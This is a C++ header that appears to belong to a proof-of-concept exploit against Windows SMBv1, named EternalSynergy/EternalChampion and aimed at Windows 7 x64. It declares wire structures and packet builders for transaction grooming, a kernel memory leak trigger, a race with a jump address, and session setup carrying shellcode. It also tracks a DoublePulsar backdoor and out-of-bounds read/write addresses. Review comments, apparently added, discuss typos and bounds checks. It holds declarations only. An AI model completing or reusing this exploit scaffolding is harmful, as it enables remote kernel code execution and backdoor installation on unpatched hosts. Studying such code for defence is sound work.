#pragma once
#ifndef UNICODE
#define UNICODE
#endif
#include "smbtreeconnectandx.h"
#include <Windows.h>
#include <winternl.h>
#include <intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>
#include <wincrypt.h>
#include "smbntcreateandx.h"
#include "smbpacketstrings.h"
#pragma intrinsic(memcpy, memset)
#pragma pack(push, 1)
// SMB1 message header exactly as it appears on the wire. #pragma pack(1) is
// in effect (pushed just above, popped just below), so the members add up to
// 32 bytes with no padding -- the same size as smb_info::headerinfo.
typedef struct _SMB_HEADER {
BYTE Protocol[4]; // protocol identifier bytes
BYTE Command; // SMB command code
union {
struct {
BYTE ErrorClass;
BYTE Reserved;
WORD Error;
}DosError; // DOS-style error class + code
DWORD NtStatus; // NT-style status; overlays DosError (4 bytes either way)
}Status;
BYTE Flags;
WORD Flags2;
union {
WORD Reserved[6]; // 12 bytes: the widest member, fixes the union size
struct {
WORD PidHigh;
union {
struct {
DWORD Key;
WORD Sid;
WORD SequenceNumber;
WORD Gid;
};
BYTE SecuritySignature[8]; // overlays Key/Sid/SequenceNumber/Gid
};
};
};
WORD Tid; // tree id
WORD Pid; // process id (low word; high word is PidHigh above)
WORD Uid; // user id
WORD Mid; // multiplex id
}SMB_HEADER, * PSMB_HEADER;
#pragma pack(pop)
// Bookkeeping for one SMB transaction (counts, offsets and displacements of
// its parameter and data sections). Declared after #pragma pack(pop), so this
// is naturally aligned and is NOT a wire structure. Presumably populated from
// a received packet by SyncTransactionInfo() (declared below) -- confirm.
// NOTE(review): PadingOffset is a typo of PaddingOffset, kept because callers
// reference it by name.
typedef struct _TRANSACTION_INFORMATION {
DWORD TotalParameterCount;
DWORD TotalDataCount;
DWORD MaxParameterCount;
DWORD MaxDataCount;
DWORD ParameterCount;
DWORD ParameterOffset;
DWORD DataDisplacement;
DWORD ParameterDisplacement;
DWORD DataCount;
DWORD DataOffset;
DWORD Timeout;
BYTE SetupCount;
BYTE WordCount;
WORD Function;
WORD PadingOffset;
WORD MaxSetupCount;
WORD ByteCountOffset;
}TRANSACTION_INFORMATION, * PTRANSACTION_INFORMATION;
// Build-specific size/offset constants for a Windows 7 x64 target. No values
// are assigned in this header; where they are populated is not visible here
// -- TODO confirm before relying on any of them.
typedef struct _WIN7_64_TRANS_INFO {
DWORD TRANS_SIZE;
DWORD TRANS_FLINK_OFFSET;
DWORD TRANS_INPARAM_OFFSET;
DWORD TRANS_OUTPARAM_OFFSET;
DWORD TRANS_INDATA_OFFSET;
DWORD TRANS_OUTDATA_OFFSET;
DWORD TRANS_PARAMCNT_OFFSET;
DWORD TRANS_TOTALPARAMCNT_OFFSET;
DWORD TRANS_FUNCTION_OFFSET;
DWORD TRANS_MID_OFFSET;
}WIN7_64_TRANS_INFO, * PWIN7_64_TRANS_INFO;
// Architecture descriptor for an x64 target.
typedef struct _X64_INFO {
// Four-byte tag (sizeof(DWORD) == 4 on Windows). If all four bytes are used
// there is no room for a NUL terminator, so compare it with a fixed-length
// memcmp/cmp, never with strcmp or printf("%s").
char ARCH[sizeof(DWORD)];
DWORD PTR_SIZE;
DWORD FRAG_TAG_OFFSET;
DWORD FRAG_POOL_SIZE;
DWORD POOL_ALIGN;
DWORD SRV_BUFHDR_SIZE;
}X64_INFO, * PX64_INFO;
// Per-connection session state shared by the Send/Recv handlers declared in
// this header. The id fields are read and written through the get_*/set_*
// accessors declared below.
struct smb_info {
WORD fid; // file id (get_fid/set_fid)
WORD tid; // tree id (get_tid/set_tid)
WORD pid; // process id (get_pid/set_pid)
WORD uid; // user id (get_uid/set_uid)
WORD mid; // multiplex id (get_mid/set_mid)
WORD special_mid; // get_special_mid/set_special_mid
WORD special_pid; // get_special_pid/set_special_pid
UNICODE_STRING tree_connection; // winternl.h counted string; see InitUnicodeString/FreeUnicodeString
STRING tree_connect_andx_svc; // winternl.h counted ANSI string; see InitString/FreeString
BYTE AndxCommand; // AndX chaining fields -- presumably taken from the last packet; confirm
WORD AndxOffset;
// Untyped handles. NOTE(review): TargetConnect() takes SOCKET&, sockaddr_in&
// and WSAData&, so these presumably point at those objects -- confirm; a
// typed pointer would let the compiler check that.
PVOID sockaddrpointer;
PVOID socketpointer;
PVOID wsapointer;
DWORD_PTR connection_handle;
// Transaction request/response lists and cursors into them. Presumably
// TRANS_REQUEST_LIST* / TRANS_RESPONSE_LIST* (see AllocateAndSetupTransaction*List)
// -- confirm; stored untyped here.
PVOID transrequestlist;
PVOID transresponselist;
PVOID currenttransreqentry;
PVOID currenttransrespentry;
DWORD srv_last_error;
BYTE headerinfo[32]; // raw copy of one SMB_HEADER (32 bytes under pack(1))
BOOL DoublePulsarInstalled; // state observed on the remote host; set elsewhere -- confirm
WORD DoublePulsarXorKey;
WORD TransIndataShiftCount;
WORD TransFragTagOffset;
WORD TransConnectionOffset;
ULONG_PTR LastOOBReadAddress;
ULONG_PTR LastOOBWriteAddress;
TRANSACTION_INFORMATION* TransactionContext; // ownership not visible here -- confirm who frees it
};
// Sized byte buffer: dwsize bytes starting at pbdata. The tag BUFFER is used
// directly as a type name throughout this header (C++ semantics); the typedef
// names are BUFWITHSIZE/PBUFWITHSIZE. Storage is managed by bwsalloc/bwsfree
// (declared below). Nothing in the cpy/bzero macros checks a destination
// against dwsize, so every writer must bound its size by dwsize itself.
typedef struct BUFFER {
DWORD dwsize; // number of valid/allocated bytes at pbdata
PBYTE pbdata; // heap storage -- presumably owned by this BUFFER; confirm in bwsfree
}BUFWITHSIZE, * PBUFWITHSIZE;
// Singly-linked list node holding one received response and parsed views into
// it. NOTE(review): the four pointer members presumably point inside
// KrnlLeakResponse.pbdata, so they dangle once that buffer is freed -- confirm
// that FreeLeakdataLinkedListBuffers() clears or drops them together.
struct LeakedDataLinkedList {
BUFFER KrnlLeakResponse; // owning buffer for the whole response
PDWORD ResponseNetbios; // NetBIOS session header -- presumably at pbdata; confirm
PSMB_HEADER ResponseHeader; // SMB header view
PBYTE ResponseParameters; // parameter block view
PBYTE ResponseData; // data block view
LeakedDataLinkedList* NextEntry; // NULL-terminated? -- confirm; see FreeLeakdataLinkedListBuffers
};
// Singly-linked list node for one received SMB packet. Freed by
// FreeResponseLinkedListBuffers() / FreeResponseLinkedListSingleEntry().
struct ResponsePacketLinkedList {
BUFFER ThisPacket; // owning buffer for the raw packet
PSMB_HEADER ThisSmb; // SMB header view -- presumably inside ThisPacket.pbdata; confirm
PVOID ThisNetbiosSize; //(WORD *) -- original annotation: points at the NetBIOS length word
ResponsePacketLinkedList* NextEntry;
};
// Singly-linked list node for one outgoing SMB packet; same shape as
// ResponsePacketLinkedList. Freed by FreeRequestLinkedListBuffers() /
// FreeRequestLinkedListSingleEntry().
struct RequestPacketLinkedList {
BUFFER ThisPacket; // owning buffer for the raw packet
PSMB_HEADER ThisSmb; // SMB header view -- presumably inside ThisPacket.pbdata; confirm
PVOID ThisNetbiosSize; //(WORD *) -- original annotation: points at the NetBIOS length word
RequestPacketLinkedList* NextEntry;
};
#pragma pack(push, 1)
// One machine address viewed through several pointer/integer types. Reading a
// member other than the one last written is type punning through a union;
// MSVC accepts it but it is not guaranteed by the C++ standard. Packed (see
// #pragma pack above) so addressbytes aliases the pointer exactly.
// NOTE(review): only the pointer typedef PANYPOINTER is declared; the struct
// itself is named by its tag ANYPOINTER (C++).
typedef struct ANYPOINTER {
union {
PVOID pvpointer;
PBYTE pbpointer;
PSTR ppointer;
const char* pccpointer;
PWSTR pwpointer;
const wchar_t* pcwpointer;
ULONG_PTR address; // integer view of the same value
ULONG_PTR* paddress;
BYTE addressbytes[sizeof(PVOID)]; // byte-wise view, pointer-sized
};
}*PANYPOINTER;
// Anonymous union: one SMB_COM_TRANSACTION-family request pointer viewed as
// whichever typed request structure applies. The PREQ_* types are declared in
// the included smb*.h headers -- confirm which one. Packed (see #pragma pack
// above), every member is pointer-sized.
typedef struct _ANYTRANSACTION_REQUEST {
union {
PVOID pvpointer;
PBYTE pbpointer;
ULONG_PTR address; // integer view of the same pointer
PREQ_TRANSACTION trans;
PREQ_TRANSACTION_SECONDARY transsecondary;
PREQ_TRANSACTION2 trans2;
PREQ_TRANSACTION2_SECONDARY trans2secondary;
PREQ_NT_TRANSACTION nttrans;
PREQ_NT_TRANSACTION_SECONDARY nttranssecondary;
};
}ANYTRANSACTION_REQUEST, * PANYTRANSACTION_REQUEST;
// Anonymous union: one SMB_COM_TRANSACTION-family response pointer viewed as
// whichever typed response structure applies. NOTE(review): transsecondary and
// nttranssecondary are INT_PTR rather than pointer types -- presumably because
// secondary requests have no dedicated response structure; confirm before
// dereferencing through them.
typedef struct _ANYTRANSACTION_RESPONSE {
union {
PVOID pvpointer;
PBYTE pbpointer;
ULONG_PTR address; // integer view of the same pointer
PRESP_TRANSACTION trans;
INT_PTR transsecondary;
PRESP_TRANSACTION2 trans2;
PRESP_TRANSACTION_INTERIM transinterim;
PRESP_NT_TRANSACTION nttrans;
INT_PTR nttranssecondary;
};
}ANYTRANSACTION_RESPONSE, * PANYTRANSACTION_RESPONSE;
#pragma pack(pop)
// Doubly-linked (Flink/Blink) list entry for one outstanding transaction
// request. Allocated by AllocateAndSetupTransactionReqList(), populated by
// FillInTransRequestEntry(), released by FreeTransactionReqList().
typedef struct TRANS_REQUEST_LIST {
ANYTRANSACTION_REQUEST transaction; // typed view of the request body
PSMB_HEADER smb; // header of the same packet
DWORD transtype; // presumably the SMB command of the transaction; confirm
DWORD transactionfunction; // presumably the transaction sub-function; confirm
TRANS_REQUEST_LIST* Flink;
TRANS_REQUEST_LIST* Blink;
}*PTRANS_REQUEST_LIST;
// Doubly-linked (Flink/Blink) list entry for one received transaction
// response; mirrors TRANS_REQUEST_LIST. Allocated by
// AllocateAndSetupTransactionRespList(), populated by FillInTransResponseEntry(),
// released by FreeTransactionRespList().
typedef struct TRANS_RESPONSE_LIST {
ANYTRANSACTION_RESPONSE transaction; // typed view of the response body
PSMB_HEADER smb; // header of the same packet
DWORD transtype; // presumably the SMB command of the transaction; confirm
DWORD transactionfunction; // presumably the transaction sub-function; confirm
TRANS_RESPONSE_LIST* Flink;
TRANS_RESPONSE_LIST* Blink;
}*PTRANS_RESPONSE_LIST;
// Callback signatures. IN/OUT are the empty annotation macros from the Windows
// headers and carry no checking. The SOCKET& parameters make this header C++
// even though it is otherwise written in C style.
// Shape shared by the *_packet builders below that take only the four ids
// (e.g. negotiate_request_packet, trans_groom_packet, tree_disconnect_packet).
typedef PBYTE(*packet_creation_handler_type_one)(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
// Shape of SendRecvTreeDisconnect / SendRecvLogoffAndx (no extra argument).
typedef BOOLEAN(*SendRecvHandlerTypeOne)(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
// Shape of SendRecvTrans2QueryPathInfoPacketSandwich (extra ULONGLONG argument).
typedef BOOLEAN(*SendRecvHandlerTypeTwo)(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, ULONGLONG IN address, SOCKET& IN s, smb_info* IN info);
// BUFFER management callbacks; no matching functions are declared in this
// header, so their implementations live elsewhere -- confirm.
typedef BUFFER* (*pfnbwsnew)(DWORD IN count);
typedef BOOL(*pfnbwsdelete)(BUFFER** IN OUT bws);
typedef BOOL(*pfnbwsallocateandcopy)(BUFFER IN OUT* bws, const void IN* src, DWORD IN size);
// Fixed-size comparison. Returns BOOL, so unlike memcmp() this is presumably an
// equality flag rather than an ordering -- confirm against the definition.
// NOTE(review): identifiers beginning with a double underscore are reserved for
// the implementation; a name like smb_memcmp would be safe.
BOOL __cdecl __memcmp(const void* a, const void* b, DWORD size);
// Thin wrappers. None of them checks the destination capacity: callers must
// bound `size` by the target BUFFER's dwsize (or the array length) before use.
#define cpy(dst, src, size) (memcpy(dst, src, (size_t)(size)))
// NOTE(review): unlike cpy/bzero, `size` is passed through uncast; __memcmp
// takes a DWORD, so a size_t argument narrows silently.
#define cmp(a, b, size) (__memcmp(a, b, size))
// NOTE(review): bzero is also a POSIX function name; harmless on Windows but
// it will clash if this header is ever compiled elsewhere.
#define bzero(ptr, size) (memset((ptr), 0x00, (size_t)(size)))
// Searches bws for `pattern` (patternsize bytes); on success presumably writes
// the match location to result and returns TRUE -- confirm; result is left
// untouched on failure? (not visible here).
BOOL find_memory_pattern(BUFFER IN* bws, PANYPOINTER IN OUT result, const void* IN pattern, DWORD IN patternsize);
// Refreshes the id fields of info from a received packet -- presumably the
// header fields; confirm which members are touched.
VOID update_smb_info(smb_info* info, BUFFER* IN newpacket);
// CSPRNG lifecycle and output. wincrypt.h is included, so this is presumably
// backed by the CryptoAPI provider -- confirm; csprng() has no return value,
// so callers cannot detect a failed fill.
BOOL csprngcryptostartup(void);
BOOL csprngcryptoshutdown(void);
void csprng(PBYTE buffer, DWORD size);
// NOTE(review): random() collides with the POSIX function of the same name on
// non-Windows toolchains.
unsigned int random(void);
// Transaction list lifecycle. The Allocate* functions create `count` entries
// and hand back the head through listptr; the Free* functions take the same
// double pointer, presumably so they can NULL it -- confirm.
BOOL __stdcall AllocateAndSetupTransactionReqList(TRANS_REQUEST_LIST** IN OUT listptr, DWORD IN count);
BOOL __stdcall AllocateAndSetupTransactionRespList(TRANS_RESPONSE_LIST** IN OUT listptr, DWORD IN count);
BOOL __stdcall FreeTransactionReqList(TRANS_REQUEST_LIST** IN OUT list);
BOOL __stdcall FreeTransactionRespList(TRANS_RESPONSE_LIST** IN OUT list);
// Populates one list entry from a packet node (entry keeps pointers into the
// node's buffer -- presumably; confirm lifetime).
BOOL __stdcall FillInTransRequestEntry(TRANS_REQUEST_LIST* entry, RequestPacketLinkedList* req);
BOOL __stdcall FillInTransResponseEntry(TRANS_RESPONSE_LIST* entry, ResponsePacketLinkedList* resp);
// Fills transinfo from a packet. Any counts/offsets it copies come straight
// from network data and must be range-checked against packet->dwsize before
// being used as indices.
BOOL __stdcall SyncTransactionInfo(TRANSACTION_INFORMATION* transinfo, BUFFER* IN packet);
/*
*
*
* memory allocation buffer with size functions
*
*
*/
// Allocates `size` bytes into bws. NOTE(review): the void return gives no way
// to report allocation failure; callers should check bws->pbdata (and dwsize)
// before writing.
void bwsalloc(BUFFER OUT* bws, DWORD IN size);
// Releases bws->pbdata -- presumably also resets dwsize/pbdata; confirm.
void bwsfree(BUFFER IN* bws);
// Appends src to dst -- presumably growing dst; confirm that dst->dwsize is
// updated and that the DWORD sum cannot wrap.
void bwscat(BUFFER IN OUT* dst, BUFFER IN* src);
/*
*
*
* Linked list functions
*
*
*/
// Walk a list from liststart and free every node's buffers. ListElementCount
// is annotated IN but passed by pointer -- presumably decremented or zeroed as
// nodes are freed; confirm.
void __stdcall FreeRequestLinkedListBuffers(RequestPacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
void __stdcall FreeResponseLinkedListBuffers(ResponsePacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
void __stdcall FreeLeakdataLinkedListBuffers(LeakedDataLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
// Free one node only; the caller is responsible for unlinking it first --
// presumably, since no list head is passed.
void __stdcall FreeRequestLinkedListSingleEntry(RequestPacketLinkedList* IN OUT entrypointer);
void __stdcall FreeResponseLinkedListSingleEntry(ResponsePacketLinkedList* IN OUT entry);
/*
*
*
* STRING functions
*
*
*/
// Counted-string helpers for the winternl.h STRING / UNICODE_STRING types.
// Init* presumably allocate a copy of cstr (hence the matching Free*) --
// confirm; pair every Init with a Free.
void __stdcall InitString(PCSTR IN cstr, STRING* IN OUT str);
void __stdcall FreeString(STRING* IN OUT str);
void __stdcall InitUnicodeString(PCWSTR IN cstr, UNICODE_STRING* IN OUT str);
void __stdcall FreeUnicodeString(UNICODE_STRING* IN OUT str);
// Conversions between the two; the destination presumably owns new storage --
// confirm.
void __stdcall ConvertStringToUnicode(STRING* IN s, UNICODE_STRING* IN OUT u);
void __stdcall ConvertUnicodeToString(UNICODE_STRING* IN u, STRING* IN OUT s);
// Debug dump of `size` bytes at vdata.
void DumpHex(const void* vdata, DWORD size);
// Accessors for the id fields of smb_info (see that struct).
WORD get_pid(smb_info*);
WORD get_uid(smb_info*);
WORD get_mid(smb_info*);
WORD get_tid(smb_info*);
WORD get_fid(smb_info*);
WORD get_special_mid(smb_info*);
WORD get_special_pid(smb_info*);
void set_pid(smb_info*, WORD);
void set_uid(smb_info*, WORD);
void set_mid(smb_info*, WORD);
void set_tid(smb_info*, WORD);
void set_fid(smb_info*, WORD);
void set_special_mid(smb_info*, WORD);
void set_special_pid(smb_info*, WORD);
/*
*
*
* networking functions
*
*
*/
// Socket layer. Each function returns an unsigned int and also reports through
// the `status` reference; which of the two carries the error is not visible
// here -- confirm before checking only one.
// Initialises wsa/sa/s for targetip.
unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status);
// Sends bws->dwsize bytes from bws->pbdata -- presumably; confirm partial sends are handled.
unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status);
// Receives up to bufsize bytes into bws; bufsize must not exceed the storage
// behind bws->pbdata.
unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status);
// Reads the NetBIOS session header and returns the announced length. That value
// comes from the peer and must be bounded before it sizes any buffer.
unsigned int SmbRecvNetbiosSize(SOCKET& s, unsigned int& status);
// Receives one whole SMB message into bws (no status out-parameter on this one).
unsigned int SmbRecv(BUFFER IN OUT* bws, SOCKET IN& s);
// Receives transaction responses into the two lists until the response whose
// Mid equals midoftransactiontofind arrives -- presumably; confirm.
unsigned int SmbRecvTransaction(ResponsePacketLinkedList IN OUT* responselist, TRANS_RESPONSE_LIST IN OUT* transresponselist, SOCKET& IN s, WORD IN midoftransactiontofind);
/*
*
*
* begin smb packet creation functions
*
*
*/
/*
*
*
* eternalsynergy_poc2 packet creation functions
*
*
*/
// Request builders. Each fills bws with one SMB request carrying the given
// pid/uid/mid/tid in its header and returns a PBYTE -- presumably a cursor
// into bws->pbdata; confirm whether NULL signals failure.
PBYTE negotiate_request_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
// shellcode is copied into the request body; its dwsize bounds the copy -- confirm.
PBYTE session_setup_packet(BUFFER IN OUT* bws, BUFFER IN * shellcode, WORD pid, WORD uid, WORD mid, WORD tid);
// unc: the share path as a UNICODE_STRING (see InitUnicodeString).
PBYTE tree_connect_packet(BUFFER IN OUT* bws, UNICODE_STRING* unc, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_create_andx_packet(BUFFER IN OUT* bws, WORD rootfid, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_create_andx_packet_custom(BUFFER IN OUT* bws, UNICODE_STRING *namedpipe, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE trans_groom_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_trans_nt_rename_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
// NOTE(review): "sandwitch" in the next two names is a typo of "sandwich"
// (compare trans2_query_path_info_packet_sandwich_packet); kept for callers.
PBYTE nt_trans_secondary_packet_sandwitch_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE nt_trans_packet_sandwitch_leak_trigger(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
PBYTE trans2_query_path_info_packet_sandwich_packet(BUFFER* IN OUT bws, ULONGLONG IN jmp_addr, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
/*
*
*
*
*
* SMB Disconnect packet creation functions
*
*
*
*/
// Session teardown request builders; both match packet_creation_handler_type_one.
PBYTE tree_disconnect_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
PBYTE logoff_andx_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
/*
*
*
* eternalsynergy_poc2 send/receive functions
*
*
*/
// Send one request and receive its response, appending to the outbound and
// inbound lists and updating info. Return BOOLEAN success; on FALSE the lists
// may already hold partially-built nodes -- confirm cleanup expectations.
BOOLEAN SendRecvNegotiate(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info);
BOOLEAN SendRecvSessionSetupAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, BUFFER IN * shellcode);
// ip: wide string used to build the tree-connect path -- presumably; confirm.
BOOLEAN SendRecvTreeConnectAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, PCWSTR IN ip);
BOOLEAN SendRecvNtCreateAndx(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvTransGroomPacket(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvNtTransNtRename(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
BOOLEAN SendRecvNtTransSecondaryPacketSandwich(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
// Matches SendRecvHandlerTypeTwo (extra ULONGLONG argument).
BOOLEAN SendRecvTrans2QueryPathInfoPacketSandwich(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, ULONGLONG IN jmp_addr, SOCKET& s, smb_info* IN info);
/*
*
*
*
*
* SMB Disconnect networking functions
*
*
*
*/
// Session teardown exchanges; both match SendRecvHandlerTypeOne.
BOOLEAN SendRecvTreeDisconnect(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
BOOLEAN SendRecvLogoffAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
/*
*
*
* eternalsynergy_poc2 threaded functions
*
*
*/
// Thread entry point: DWORD __stdcall (PVOID) is the LPTHREAD_START_ROUTINE
// shape, so this is presumably passed to CreateThread with pvip_addr pointing
// at the target address string -- confirm the pointee type and its lifetime
// across the thread boundary.
DWORD __stdcall EternalChampionExec(PVOID IN pvip_addr);
// Stage drivers. Each returns a WORD (presumably a status/id; confirm) and
// accumulates raw traffic into sentdata/recieveddata.
// NOTE(review): "recieveddata" is a misspelling of "receiveddata"; parameter
// names are not part of the ABI, so renaming here is safe if the .cpp follows.
WORD __stdcall SmbTreeConnectAndx(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, PCWSTR IN unicodeip, BUFFER IN * shellcode, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbNtCreateAndx(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbTransactionGroomNtTransactionNtRenameLeak(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbTransaction2Race(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, ULONGLONG IN jmp_addr, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);
WORD __stdcall SmbDisconnectAndLogoff(RequestPacketLinkedList IN OUT* requestliststart, ResponsePacketLinkedList IN OUT* responseliststart, smb_info IN OUT* info, BUFFER IN OUT* sentdata, BUFFER IN OUT* recieveddata);